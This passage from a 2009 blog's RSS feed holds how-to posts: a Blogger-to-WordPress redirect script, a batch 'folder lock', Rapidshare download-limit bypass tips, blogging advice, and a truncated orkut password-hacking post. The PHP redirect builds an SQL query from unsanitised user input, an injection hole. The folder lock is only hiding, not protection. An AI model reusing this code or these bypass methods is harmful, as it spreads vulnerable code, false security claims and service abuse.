Pidgin.</description><link>http://123mycomputer.blogspot.com/2009/09/use-facebook-chat-without-opening.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-4493311078576309823</guid><pubDate>Sun, 13 Sep 2009 01:41:00 +0000</pubDate><atom:updated>2009-09-12T18:45:25.683-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Internet</category><title>Migrate from Blogger to WordPress without Losing your Google Search Rankings</title><description>&lt;strong&gt;The Goal&lt;/strong&gt;: Your current blog at abc.blogspot.com is hosted on the Blogger platform but you now want to move this blog from Blogger to WordPress (self-hosted) with a personal domain name (say abc.com). &lt;p&gt;&lt;strong&gt;The Problem&lt;/strong&gt;: WordPress.org provides &lt;a title="Import Content from Blogger to WordPress" href="http://labnol.blogspot.com/2007/05/move-your-blogs-from-blogger-to.html"&gt;an easy option&lt;/a&gt; to automatically import all your old blog posts and reader comments from Blogger into your new WordPress blog but there are still some bigger problems that are hard to ignore:&lt;/p&gt; &lt;p&gt;1. Some of your previous articles on the blogspot blog could be ranking very high in search engines for certain keywords but once you shift these articles to a new address, you might lose all that organic search traffic. &lt;/p&gt; &lt;p&gt;2. You cannot use a 301 redirect with Blogger to inform search engines that your site has permanently moved a new web address thus losing PageRank and other Google Juice. &lt;/p&gt; &lt;p&gt;3. Not just search bots, human beings who come to read your old articles via links from other sites won’t know about the new location of those articles unless you manually insert the new links in each and every blogspot article (impossible for large blogs). &lt;/p&gt; &lt;p&gt;4. When you switch blogging platforms, existing blog readers who are subscribed to your Blogger RSS Feed may be lost forever if they don’t manually update their RSS readers with your new WordPress feed address (and most won’t). &lt;/p&gt; &lt;p&gt;5. When you lose RSS subscribers and search engines rankings, the pageviews will drop and that will seriously impact your AdSense revenue in case you are running Google ads. &lt;/p&gt; &lt;p&gt;&lt;strong&gt;The Solution&lt;/strong&gt;: Now that you are aware of the various issues associated with moving sites from Blogger to WordPress, the very good news is that there exists a simple solution to deal with all these problems in one go.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;You can quickly and safely migrate any blog from Blogger to WordPress without losing RSS Subscribers or human visitors and there’s also a way to pass all that Google Juice from the old blogspot.com address to your new WordPress blog.&lt;/strong&gt;&lt;/p&gt; &lt;h2&gt;How to Move a Blog from Blogger to WordPress&lt;/h2&gt; &lt;p&gt;Important: Before you implement anything, it may be a good idea to run through these steps on a dummy blog first. Also, &lt;a href="http://www.labnol.org/internet/blogging/backup-your-blogger-blog/5984/"&gt;backup your Blogger blog&lt;/a&gt; including the XML template, posts and comments just to be the safe side.&lt;/p&gt; &lt;p&gt;If something doesn’t make sense, just watch the screencast video below (&lt;a title="Video - 12.8 MB" href="http://blip.tv/file/get/Amitpagarwal-MoveBlogFromBloggerToWordPressVideoTutorial727.mov"&gt;download&lt;/a&gt;).&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Step 1&lt;/strong&gt;: In case you haven’t done this already – register a new web domain, buy server space from some web hosting company* that offers PHP / MySQL hosting and and install WordPress software on your new domain.&lt;/p&gt; &lt;p&gt;*This site is hosted on Dreamhost.com but there are other good hosting options like GoDaddy, Blue Host, Media Temple and Knowhost – most services offer one-click WordPress installation so you don’t need the help of a geek.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Step 2&lt;/strong&gt;: Go to your WordPress Admin Dashboard -&gt; Tools -&gt; Import and select the Blogger option. Authorize WordPress to access your Google Account and within minutes, all your old blog posts and comments will be available on the new WordPress site.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Step 3&lt;/strong&gt;: Copy &lt;a href="http://img.labnol.org/files/blogger.php.txt"&gt;this file&lt;/a&gt; into your WordPress themes directory and then rename the file from blogger.php.txt to blogger.php. You may use either Putty with wget or Web FTP to access your WordPress themes directory located on the web server. For credentials and other details, check your cPanel.&lt;/p&gt; &lt;p&gt;Here are the contents of that file.&lt;/p&gt; &lt;pre&gt;&lt;?php
&lt;br /&gt;/*
&lt;br /&gt; Template Name: blogger
&lt;br /&gt;*/
&lt;br /&gt;
&lt;br /&gt;global $wpdb;
&lt;br /&gt;$old_url = $_GET['q'];
&lt;br /&gt;
&lt;br /&gt;if ($old_url != "") {
&lt;br /&gt;  $permalink = explode("blogspot.com", $old_url);
&lt;br /&gt;
&lt;br /&gt;  $q = "SELECT guid FROM $wpdb-&gt;posts LEFT JOIN $wpdb-&gt;postmeta ".
&lt;br /&gt;       "ON ($wpdb-&gt;posts.ID = $wpdb-&gt;postmeta.post_id) WHERE ".
&lt;br /&gt;       "$wpdb-&gt;postmeta.meta_key='blogger_permalink' AND ".
&lt;br /&gt;       "$wpdb-&gt;postmeta.meta_value='$permalink[1]'";
&lt;br /&gt;
&lt;br /&gt; $new_url = $wpdb-&gt;get_var($q)? $wpdb-&gt;get_var($q) : "/";
&lt;br /&gt;
&lt;br /&gt; header ("HTTP/1.1 301 Moved Permanently");
&lt;br /&gt; header("Location: $new_url");
&lt;br /&gt;}
&lt;br /&gt;?&gt;&lt;/pre&gt; &lt;p&gt;&lt;strong&gt;Step 4&lt;/strong&gt;. Open your WordPress dashboard and go to Pages -&gt; Add New Page. Keep the title and URL of that page as blogger and select "blogger" from the Template drop-down. Save. There’s no need to add any content to this page.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Step 5&lt;/strong&gt;. Open the &lt;a href="http://digitalinspiration.com/tools/blogger/"&gt;template generator&lt;/a&gt;, type the full address of your new WordPress blog (including http:// and the trailing slash) and this tool will create a new classic template for your blogspot blog that will look something like this.&lt;/p&gt; &lt;pre&gt;&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"&gt;
&lt;br /&gt;&lt;html xmlns="http://www.w3.org/1999/xhtml" lang="en" lang="en" dir=""&gt;"&gt;
&lt;br /&gt;&lt;head&gt;
&lt;br /&gt;&lt;title&gt;&lt;$BlogPageTitle$&gt;&lt;/title&gt;
&lt;br /&gt;&lt;script type="text/javascript"&gt;
&lt;br /&gt;&lt;mainorarchivepage&gt;window.location.href='xxx'&lt;/mainorarchivepage&gt;
&lt;br /&gt;&lt;blogger&gt;&lt;itempage&gt;window.location.href='xxxblogger/?q=&lt;$BlogItemPermalinkURL$&gt;'&lt;/itempage&gt;&lt;/blogger&gt;
&lt;br /&gt;&lt;/script&gt;&lt;/head&gt;&lt;body&gt;
&lt;br /&gt;&lt;div style="border:#ccc 1px solid; background:#eee; padding:20px; margin:80px;"&gt;
&lt;br /&gt; &lt;p&gt;This page has moved to a new address.&lt;/p&gt;
&lt;br /&gt; &lt;h1&gt;
&lt;br /&gt;  &lt;mainorarchivepage&gt;&lt;a href="xxx"&gt;&lt;$BlogTitle$&gt;&lt;/a&gt;&lt;/mainorarchivepage&gt;
&lt;br /&gt;   &lt;blogger&gt;
&lt;br /&gt;    &lt;itempage&gt;&lt;a href="" q="&lt;$BlogItemPermalinkURL$"&gt;"&gt;&lt;$BlogItemTitle$&gt;&lt;/a&gt;&lt;/itempage&gt;
&lt;br /&gt;   &lt;/blogger&gt;
&lt;br /&gt; &lt;/h1&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/body&gt;&lt;/html&gt;
&lt;br /&gt;&lt;!-- replace xxx with your WordPress site URL ---&gt;&lt;/pre&gt; &lt;p&gt;&lt;strong&gt;Step 6&lt;/strong&gt;. Open your Blogger Dashboard -&gt; Layout -&gt; Edit HTML and choose "Revert to Classic Blog". Copy-paste the template generated in Step 5 in the "Edit Template" area and click "Save Template Changes".&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Your are done&lt;/strong&gt;. Open any page on your old Blogger blog and it should redirect you to the corresponding WordPress page. On the WordPress side, since we are using a permanent 301 redirect with the redirection URLs, all the Google Juice will probably pass to your new WordPress pages with time.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Update your RSS Feed&lt;/strong&gt;: When you move from Blogger to WordPress, the address of your RSS feed will change as well. Go to Blogger -&gt; Settings -&gt; Site Feed, type the address of your new WordPress RSS feed here and Google Reader, Bloglines, etc. will automatically move to your new feed. Check this &lt;a href="http://www.labnol.org/internet/tools/feedburner-rss-feeds-faq-problems-tips/1199/"&gt;FeedBurner FAQ&lt;/a&gt; for some more ideas.&lt;/p&gt; &lt;h2&gt;Video Tutorial – Move from Blogspot to WordPress&lt;/h2&gt; &lt;p&gt;&lt;object width="530" height="429"&gt;&lt;param name="movie" value="http://www.youtube.com/v/3lJHMt9roGE&amp;amp;rel=0&amp;amp;fs=1&amp;amp;showsearch=0&amp;amp;showinfo=0&amp;amp;hd=1"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/3lJHMt9roGE&amp;amp;rel=0&amp;amp;fs=1&amp;amp;showsearch=0&amp;amp;showinfo=0&amp;amp;hd=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="530" height="429"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/p&gt; &lt;p&gt;Now that your new WordPress site is up and running with all the old Blogger posts, here are a &lt;strong&gt;few important things&lt;/strong&gt; you should do:&lt;/p&gt; &lt;p&gt;1. Add your new WordPress site to Google Webmaster, verify ownership and and submit a Sitemap listing the URLs on your new site.&lt;/p&gt; &lt;p&gt;2. When you migrate from Blogger to WordPress, all your pictures and screenshot images hosted on Blogger / Picasa Web Albums will not get imported into WordPress. Therefore never delete your old blogger blog as it will break images that are now embedded in your WordPress posts.&lt;/p&gt; &lt;p&gt;3. Once the search bots and human beings start flocking to your new site,  you may update the homepage of your blogspot blog with links to some of your best posts.&lt;/p&gt; &lt;p&gt;4. To know how Googlebot will view your existing Blogspot blog, just turn off JavaScript in the browser and try visiting any of your old blog pages. It’s a single link under H1 that points to your new address that internally does a 301 redirect.&lt;/p&gt;</description><link>http://123mycomputer.blogspot.com/2009/09/migrate-from-blogger-to-wordpress.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-5581359591763522764</guid><pubDate>Sun, 13 Sep 2009 01:37:00 +0000</pubDate><atom:updated>2009-09-12T18:41:22.281-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Internet</category><title>How We Prioritize Online Distractions Without Knowing</title><description>&lt;h1&gt;You have a new email messages from A", "B wants to be your friend on Facebook", "C sent you a direct message on Twitter", "You have D unread items in Google Reader", "Your friend E is available for chat on Skype", "There’s a new SMS from F on your mobile phone"… and the list continues.  &lt;/h1&gt;&lt;p&gt;Whether you are at the computer or using a smartphone, there are plenty of things happening around you simultaneously that can easily distract you from the task at hand. &lt;/p&gt; &lt;p&gt;&lt;a href="http://img.labnol.org/di/distractions.gif" target="_blank"&gt;&lt;img style="border-width: 0px; display: inline;" title="online distractions" alt="online distractions" src="http://img.labnol.org/di/distractions_thumb.gif" width="540" border="0" height="556" /&gt;&lt;/a&gt;&lt;/p&gt; &lt;p&gt;However, making that switch from one distraction to another is not always in random order because &lt;strong&gt;some distractions are naturally more important than others&lt;/strong&gt;. For instance, you will probably answer a phone call or read that SMS message first before approving that pending friends’ request on Facebook.&lt;/p&gt; &lt;p&gt;David McCandless, author of &lt;a href="http://www.amazon.com/exec/obidos/ASIN/0061748366/harpercollinspub/"&gt;The Visual Miscellaneum&lt;/a&gt;, has created an &lt;a title="The Hierarchy Of Digital Distractions" href="http://www.informationisbeautiful.net/visualizations/the-hierarchy-of-digital-distractions/"&gt;interesting chart&lt;/a&gt; that illustrates how we prioritize these various digital distractions (or interruptions), often unknowingly, in our minds.&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;If you get a new SMS whilst opening a new online dating message, you’ll be hard pressed not to read that SMS. It’ll take a great force of will. You may attempt to do both simultaneously. But if you really observe yourself closely, one will take priority – even if it’s only by milliseconds. The SMS will win your attention. &lt;/p&gt; &lt;/blockquote&gt; &lt;p&gt;The level of distraction increases as you move up the chart and vice-versa. &lt;/p&gt;</description><link>http://123mycomputer.blogspot.com/2009/09/how-we-prioritize-online-distractions.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-6009210777502461670</guid><pubDate>Fri, 11 Sep 2009 01:38:00 +0000</pubDate><atom:updated>2009-09-10T18:39:03.564-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hack</category><title>Folder Lock Without Any Software</title><description>&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Folder Lock With Password Without Any Software-&lt;/div&gt;&lt;div&gt;Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').&lt;/div&gt;&lt;div&gt;Any name will do. &lt;/div&gt;&lt;div&gt;Then you see a batch file. Double click on this batch file to create a folder locker. &lt;/div&gt;&lt;div&gt;New folder named 'Locker' would be formed at the same location. &lt;/div&gt;&lt;div&gt;Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'. &lt;/div&gt;&lt;div&gt;If you want to unlock your files,double click the batch file again and you would be prompted for password. &lt;/div&gt;&lt;div&gt;Enter the password and enjoy access to the folder.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK&lt;/div&gt;&lt;div&gt;if NOT EXIST Locker goto MDLOCKER&lt;/div&gt;&lt;div&gt;:CONFIRM&lt;/div&gt;&lt;div&gt;echo Are you sure u want to Lock the folder(Y/N)&lt;/div&gt;&lt;div&gt;set/p "cho=&gt;"&lt;/div&gt;&lt;div&gt;if %cho%==Y goto LOCK&lt;/div&gt;&lt;div&gt;if %cho%==y goto LOCK&lt;/div&gt;&lt;div&gt;if %cho%==n goto END&lt;/div&gt;&lt;div&gt;if %cho%==N goto END&lt;/div&gt;&lt;div&gt;echo Invalid choice.&lt;/div&gt;&lt;div&gt;goto CONFIRM&lt;/div&gt;&lt;div&gt;:LOCK&lt;/div&gt;&lt;div&gt;ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"&lt;/div&gt;&lt;div&gt;attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"&lt;/div&gt;&lt;div&gt;echo Folder locked&lt;/div&gt;&lt;div&gt;goto End&lt;/div&gt;&lt;div&gt;:UNLOCK&lt;/div&gt;&lt;div&gt;echo Enter password to Unlock folder&lt;/div&gt;&lt;div&gt;set/p "pass=&gt;"&lt;/div&gt;&lt;div&gt;if NOT %pass%==type your password here goto FAIL&lt;/div&gt;&lt;div&gt;attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"&lt;/div&gt;&lt;div&gt;ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker&lt;/div&gt;&lt;div&gt;echo Folder Unlocked successfully&lt;/div&gt;&lt;div&gt;goto End&lt;/div&gt;&lt;div&gt;:FAIL&lt;/div&gt;&lt;div&gt;echo Invalid password&lt;/div&gt;&lt;div&gt;goto end&lt;/div&gt;&lt;div&gt;:MDLOCKER&lt;/div&gt;&lt;div&gt;md Locker&lt;/div&gt;&lt;div&gt;echo Locker created successfully&lt;/div&gt;&lt;div&gt;goto End&lt;/div&gt;&lt;div&gt;:End&lt;/div&gt;</description><link>http://123mycomputer.blogspot.com/2009/09/folder-lock-without-any-software.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-1897403714185095325</guid><pubDate>Fri, 11 Sep 2009 01:37:00 +0000</pubDate><atom:updated>2009-09-10T18:38:15.465-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hack</category><title>Rapidshare Hack</title><description>&lt;div&gt;There are two hacks to beat Rapidshare download limits and waiting time.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;1) Rapidshare Hack (For Firefox Users) :-&lt;/div&gt;&lt;div&gt;The hot new Firefox plug-in takes browser customization to a whole new level by letting users filter site content or change page behaviors.&lt;/div&gt;&lt;div&gt;The glory of open-source software is that it allows anyone with the inclination and the scripting knowledge to get under the hood and hot-rod their computing environment. &lt;/div&gt;&lt;div&gt;But most of the time, that advantage is available only to people with the programming skills to make the changes they want. &lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;That's where Greasemonkey, a free plug-in for Firefox, comes in -- it simplifies hacking the browser.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Released at the end 2004, Greasemonkey is the latest in a growing arsenal of Firefox customization tools. &lt;/div&gt;&lt;div&gt;It changes how Web pages look and act by altering the rendering process. &lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;http://greasemonkey.mozdev.org/&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;1) Install the Greasemonkey extension&gt;&gt;&lt;/div&gt;&lt;div&gt;http://downloads.mozdev.org/greasemonkey/greasemonkey_0.2.6.xpi&lt;/div&gt;&lt;div&gt;2) Restart Firefox &lt;/div&gt;&lt;div&gt;3) Go to http://rapidshare.de/files/1034529/rapidshare.user.js.html&lt;/div&gt;&lt;div&gt;4) Right click on rapidshare.user.js and choose "Install User Script". &lt;/div&gt;&lt;div&gt;5) Run FireFox.&lt;/div&gt;&lt;div&gt;6) From 'File' Menu click on Open File then browse to whereever you saved the 'greasemonkey.xpi' plug-in. &lt;/div&gt;&lt;div&gt;Open it, wait a couple seconds for the install button becomes active. &lt;/div&gt;&lt;div&gt;7) Click on it to install this plug-in then CLOSE FIREFOX. &lt;/div&gt;&lt;div&gt;8) Run FireFox again. &lt;/div&gt;&lt;div&gt;From the File Menu click on Open File then browse to whereever you saved the 'rapidshare.user.js'. &lt;/div&gt;&lt;div&gt;9) Open it. &lt;/div&gt;&lt;div&gt;10) Click the Tools Menu then click on Install User Script then click OK. &lt;/div&gt;&lt;div&gt;11) Close FireFox. &lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;The script will let you enjoy "no wait" and multiple file downloads......! &lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;2) Rapidshare Hack (NIC Tricks and MAC Cloning) :-&lt;/div&gt;&lt;div&gt;Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day. &lt;/div&gt;&lt;div&gt;To get around this, you need to show the rapidshare server a different IP address.&lt;/div&gt;&lt;div&gt;Here are some methods for doing this-&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;A] Short-Out the JavaScript:&lt;/div&gt;&lt;div&gt;1) Goto the page you want to download&lt;/div&gt;&lt;div&gt;2) Select FREE button&lt;/div&gt;&lt;div&gt;3) In the address bar put this-    javascript:alert(c=0)&lt;/div&gt;&lt;div&gt;4) Click OK&lt;/div&gt;&lt;div&gt;5) Click OK to the pop-up box&lt;/div&gt;&lt;div&gt;6) Enter the captcha&lt;/div&gt;&lt;div&gt;7) Download Your File&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;B] Request a new IP address from your ISP server:&lt;/div&gt;&lt;div&gt;Here’s how to do it in windows:&lt;/div&gt;&lt;div&gt;1) Click Start&lt;/div&gt;&lt;div&gt;2) Click run&lt;/div&gt;&lt;div&gt;3) In the run box type cmd.exe and click OK&lt;/div&gt;&lt;div&gt;4) When the command prompt opens type the following. ENTER after each new line.&lt;/div&gt;&lt;div&gt;ipconfig /flushdns&lt;/div&gt;&lt;div&gt;ipconfig /release&lt;/div&gt;&lt;div&gt;ipconfig /renew&lt;/div&gt;&lt;div&gt;exit&lt;/div&gt;&lt;div&gt;5) Erase your cookies in whatever browser you are using.&lt;/div&gt;&lt;div&gt;6) Try the rapidshare download again.&lt;/div&gt;&lt;div&gt;Frequently you will be assigned a new IP address when this happens. &lt;/div&gt;&lt;div&gt;Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. &lt;/div&gt;&lt;div&gt;If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;C] Use a proxy with SwitchProxy and Firefox:&lt;/div&gt;&lt;div&gt;1) Download and install Firefox&lt;/div&gt;&lt;div&gt;2) Download and install SwitchProxy&lt;/div&gt;&lt;div&gt;3) Google for free proxies&lt;/div&gt;&lt;div&gt;4) When you hit your download limit, clean your cookies and change your proxy&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;D] You can use a bookmarklet to stop your wait times:&lt;/div&gt;&lt;div&gt;1) Open IE&lt;/div&gt;&lt;div&gt;2) Right Click On This Link&lt;/div&gt;&lt;div&gt;3) Select Add to Favorites&lt;/div&gt;&lt;div&gt;4) Select Yes to the warning that the bookmark may be unsafe.&lt;/div&gt;&lt;div&gt;5) Name it “RapidShare No Wait”&lt;/div&gt;&lt;div&gt;6) Click on the Links folder (if you want to display it in your IE toolbar)&lt;/div&gt;&lt;div&gt;7) Click OK&lt;/div&gt;&lt;div&gt;8) You may need to close and reopen IE to see it&lt;/div&gt;&lt;div&gt;9) Goto rapidshare and click the bookmarklet when you are forced to wait&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;</description><link>http://123mycomputer.blogspot.com/2009/09/rapidshare-hack.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-5725456456201541799</guid><pubDate>Wed, 09 Sep 2009 00:22:00 +0000</pubDate><atom:updated>2009-09-08T17:27:42.563-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Internet</category><title>How to make money using your blog</title><description>&lt;span class="Apple-style-span"   style=" color: rgb(204, 204, 204);  line-height: 20px; font-family:'Trebuchet MS';font-size:13px;"&gt;&lt;p&gt;&lt;span class="Apple-style-span"  style="color:#000000;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Now, there are several approaches you can consider to try to make money online. Sometimes it can get confusing as to which approach to pick first. The truth is that you can make good money online using a variety of different approaches from using affiliate marketing, adsense, eBay or creating your own product or service and marketing that. Here are some tips to help you succeed on your journey to making more money from the internet.&lt;br /&gt;&lt;br /&gt;1.Set Proper Goals:&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span class="Apple-style-span"  style="color:#000000;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;This is a very important step and it is one that very few new internet marketers actually do. Most people jump onto the internet desperate to make money without realizing that they will face many challenges along the way. Setting proper goals will help to keep you focused and on track no matter what challenges you face along the way.&lt;br /&gt;&lt;br /&gt;The first step is to decide your real reasons as to why you want to earn income online. Maybe you just want a little extra income to pay off a car payment. Perhaps you are more ambitious and are sick and tired of working at a job and want more freedom. Take your time and get in touch with the deepest reasons why you want the money. This will be the fuel that will keep you going even in darkest of times.&lt;br /&gt;&lt;br /&gt;Once you have clear powerful reasons you must write these down on a piece of paper. There is great power in writing things down and something almost magical happens that makes the accomplishment of what you write down a thousand times more likely than if you just chose to try to remember it instead.&lt;br /&gt;&lt;br /&gt;Next you need to decide on how much you want to earn 6 months, 1 year and 2 years from now. You must give yourself time to accomplish your goals so be patient. Also be realistic in the amounts you choose so a good example could be $500 a month 6 months from now and then $2000 a month 1 year from now and $5000 a month 2 years down the road. Do not look for overnight get rich quick schemes. Again you must write these income targets down ideally on the same paper that has the reasons also.&lt;br /&gt;&lt;br /&gt;Now you need to review these reasons and income targets at least once a day. It does not need to take much time, simply glance at it and remind yourself of where you are going financially and believe it. You can even carry this paper with you so it almost becomes a part of you. Reviewing these things regularly will keep your mind focused and it will also activate the part of your brain called the reticular activating system that will work for you day and night to automatically find ways to make these things a reality. Just by creating and following through on proper goals like this you are already 90 percent of the way to success.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span class="Apple-style-span"   style="font-size:100%;color:#000000;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 204, 204); "&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;span class="Apple-style-span"   style="font-size:100%;color:#000000;"&gt;&lt;p&gt;&lt;span class="Apple-style-span"  style="color:#000000;"&gt;The best way to select a proven strategy is simply to use common sense. Do not fall for get rich quick schemes because they are usually a waste of time. Some proven strategies to investigate and learn more about could be affiliate marketing, adsense, eBay marketing or if you have an idea for a product or service you could do that too.&lt;br /&gt;&lt;br /&gt;Some proven ways to market and get visitors to your site are pay per click advertising, article marketing and also learn about ethical search engine optimization so you can also get free traffic to your site from the search engines. Each of these areas will require further investigation on your part so read as many free articles as you can about them as many of these articles are written by top internet marketing professionals. Visit an article directory like Ezinearticles and read their articles on internet marketing as they can offer great free advice.&lt;br /&gt;&lt;br /&gt;3.Stick With It:&lt;br /&gt;&lt;br /&gt;Anything worthwhile in life will require a commitment on your part and you will more than likely experience many obstacles along the way. At the start it is best to pick one proven method like affiliate marketing and stick with that. Learn all you can about it and become a real expert at it. That is how you will gain the specialized knowledge you need to become a super affiliate. Do not jump from one method to the next like going from affiliate marketing to eBay marketing just because things seem a little tough. Stick with it and in time you will discover a way succeed and make more money online.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span class="Apple-style-span"  style="color:#000000;"&gt;Once again, i hope this helps and good luck with your blogging&lt;/span&gt;&lt;/p&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;/span&gt;</description><link>http://123mycomputer.blogspot.com/2009/09/how-to-make-money-using-your-blog.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-1369944223158156696</guid><pubDate>Wed, 09 Sep 2009 00:16:00 +0000</pubDate><atom:updated>2009-09-08T17:22:22.059-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Internet</category><title>What is a blog,what is needed to create good one</title><description>&lt;span class="Apple-style-span"  style="  line-height: 20px; font-family:'Trebuchet MS';"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Internet users who have desires to produce and publish their own private Internet page have to become educated about some important strategies that will help make it profitable and attractive to public audiences. In many cases, people have never designed a web site before and lack of the experience that it takes to produce a good web page that will be recognised and generate a source of income. With a little bit of knowledge and education a first time web page designer will be able to create Internet sites that will help make them a lot of money.&lt;br /&gt;&lt;br /&gt;Probably one of the simplest kinds of Internet pages to produce is called a blog, which pretty much shares topical information with Internet users. Blogs have become very popular throughout the last few years and the number of blogs that are published on the Internet each year continues to increase at a very fast rate of speed. There are many things that blog owners have to consider if they want to be successful both financially and socially.&lt;br /&gt;&lt;br /&gt;The primary objective of all blog producers should be to decide precisely how to build up the number of Internet guest traffic to the actual Internet site. One of the best ways of increasing traffic flow is through the effective use of search engines, which publish and advertise the most popular web sites on the Internet. In order to get a search engine to put your particular web site near the top of a visitor's search, there are a couple of things that should be done.&lt;br /&gt;&lt;br /&gt;The most important part for Internet page producers to remember is the quality of the web page 's content and what is published on it. The quality and effectiveness of a website's content will determine if the online business is recognized by large search engines and therefore increase its amount of traffic flow. There are a few techniques that web site designers can use to increase their popularity to both search engines and Internet users.Internet users should also remember that the type of text on an Internet page is very important.&lt;br /&gt;&lt;br /&gt;If you want your blog to be promoted by search engines, web page writers should use certain key words that visitors use to search the Internet. The titles and subtitles of the blog posts should also be carefully written so that it will have a higher chance of being promoted by search engines.With each web page post that you produce on the Internet, it has to be fairly long and contain at least two hundred words. This allows search engines to pick up more of the keywords that Internet users will be looking for and will then link to your specific blog site. If your blog posts are too short, then there will not be enough information for the search engines to share with other people.&lt;br /&gt;&lt;br /&gt;An additional and other crucial method that you can follow in order to get all you can out of your blog post is to attract the visitor 's attention with your writing and also to give room for comments and debate. Provide your readers with articles that will make them want to say something and respond on your blog. The more responses and comments that are published on your blog the more popular it will become and more people will want to visit it.&lt;br /&gt;&lt;br /&gt;Also, to generate some cashflow maybe think about features you could ad such Google Adsense, or maybe incorparate links to products through Clickbank or any other affiliate program into your blog. All these things help so be sure to give them a try.Thankyou for your time and good luck in your blogging!!!&lt;/span&gt;&lt;/span&gt;</description><link>http://123mycomputer.blogspot.com/2009/09/sep-17-2007-304-am-edt-hack-yahoo.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-7010424015845519329</guid><pubDate>Wed, 09 Sep 2009 00:13:00 +0000</pubDate><atom:updated>2009-09-08T17:16:24.542-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hack</category><title>Hacing orkut password</title><description>i dont know it works or not&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Arial; border-collapse: collapse; color: rgb(51, 51, 51); font-size: 12px; "&gt;&lt;div&gt;&lt;span id="post_date_7813870"&gt;Sep 17 2007, 3:04 AM EDT&lt;/span&gt;&lt;/div&gt;&lt;span class="threadText" 